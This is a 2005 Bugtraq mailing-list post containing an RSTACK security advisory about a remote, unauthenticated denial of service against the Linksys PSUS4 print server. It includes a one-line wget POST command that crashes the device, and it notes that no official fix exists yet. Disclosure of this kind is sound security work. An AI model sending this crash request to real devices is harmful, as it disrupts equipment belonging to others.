lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20050203224916.32663.qmail@www.securityfocus.com>
Date: 3 Feb 2005 22:49:16 -0000
From: laurent oudot <oudot@...ack.org>
To: bugtraq@...urityfocus.com
Subject: [ RSTACK Public Security Advisory ] Remote DOS against Linksys PSUS4




- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Rstack Public Security Advisory                           RSTACK SA200502-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://rstack.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Linksys PSUS4 remote Denial of Service
      Date: February 02, 2005
        ID: 200502-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -


Background
==========

PSUS4 is one of the small embedded Linksys wired print servers.

Affected products
=================

Model Name: PSUS4 (not tested against others)
Firmware Version: 6032 (not tested against others)

Description
===========

Rstack team found a tiny denial of service on the Linksys PSUS4. This device has problems to handle some weird ugly HTTP requests. No password needed.

Here is an example, to crash a remote PSUS4 :

$ wget --post-data="Br1Ce2N1c3" http://192.168.1.2/
--23:10:05--  http://192.168.1.2/
           => `index.html'
Connecting to 192.168.1.2:80... connected.
HTTP request sent, awaiting response...

=> And the PSUS4 is crashed.


Impact
======

A remote attacker could crash the device (DOS).

Workaround
==========

There is no official workaround at that time. Linksys has been contacted and a patch should be available in the future (*).
In needed, you can try to filter incoming requests by using a specific dedicated reverse proxy, but that might be a too big solution for such a little device (hint: a reboot will be necessary after each crash).

(*) "ou pas"...


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ